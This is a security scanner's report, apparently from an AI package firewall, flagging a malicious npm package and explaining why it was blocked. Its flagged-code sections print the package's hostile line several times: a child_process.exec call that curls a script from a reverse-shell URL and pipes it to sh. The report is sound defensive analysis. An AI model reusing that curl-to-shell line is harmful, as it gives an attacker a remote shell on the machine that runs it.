AI Security Review
scanned 5h ago · by lpm-firewall-aiThe package exposes a function that downloads a remote shell script and executes it with bash. The endpoint name and URL indicate reverse-shell behavior.
Static reason
High-risk behavior combination matched malicious policy.; source fingerprint signature matched known malicious package; routed for review
Trigger
Runtime call to exports.command() or running check.js
Impact
Remote code execution and likely reverse shell on the caller host
Mechanism
curl-to-shell via child_process.exec
Attack narrative
When the package entrypoint is imported and its command() export is called, it invokes child_process.exec with a bash command that curls https://reverse-shell.sh/10.0.74.133:443 and pipes the response directly into sh. check.js shows the exported function being called. This is concrete remote code execution with a reverse-shell endpoint, though not triggered by npm install lifecycle scripts.
Rationale
Direct source inspection confirms a reachable exported function executes a remote script through bash. This is malicious remote code execution rather than a noisy scanner-only finding.
Evidence
index.jscheck.jspackage.json
Network endpoints1
reverse-shell.sh/10.0.74.133:443
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports child_process.exec.
- index.js exported command runs /bin/bash with curl piped to sh.
- Remote script URL is https://reverse-shell.sh/10.0.74.133:443.
- check.js invokes internallib.command(), demonstrating reachable execution.
- package.json main points to index.js.
Evidence against
- No npm lifecycle hook runs at install time.
- Execution requires calling the exported command or running check.js.
Behavioral surface
ChildProcessShell
TrivialUrlStrings
Source & flagged code
5 flagged · loading sourceindex.jsView file
1const { exec } = require('child_process');
L2:
...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
Critical
1Trigger-reachable chain: manifest.main -> index.js
L1: const { exec } = require('child_process');
L2:
...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
index.jsView on unpkg · L11const { exec } = require('child_process');
L2:
High
4console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
High
•matchType = malicious_source_fingerprint_signature
signature = 664ce3e800c949fb
signatureType = suspicious_hashes
sourceLabel = Datadog
matchedPackage = @joaoxxx/internallib-v325@1.0.7
matchedPath = index.js
matchedIdentity = npm:[redacted]:1.0.7
similarity = 1.000
shingleOverlap = 2
summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/@joaoxxx@internallib-v325/1.0.7/2026-01-09-@joaoxxx_internallib-v325-v1.0.7.zip
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
index.jsView on unpkgFindings
2 Critical3 High2 Low
CriticalDownload Executeindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Processindex.js
HighShellindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
LowScripts Present
LowUrl Strings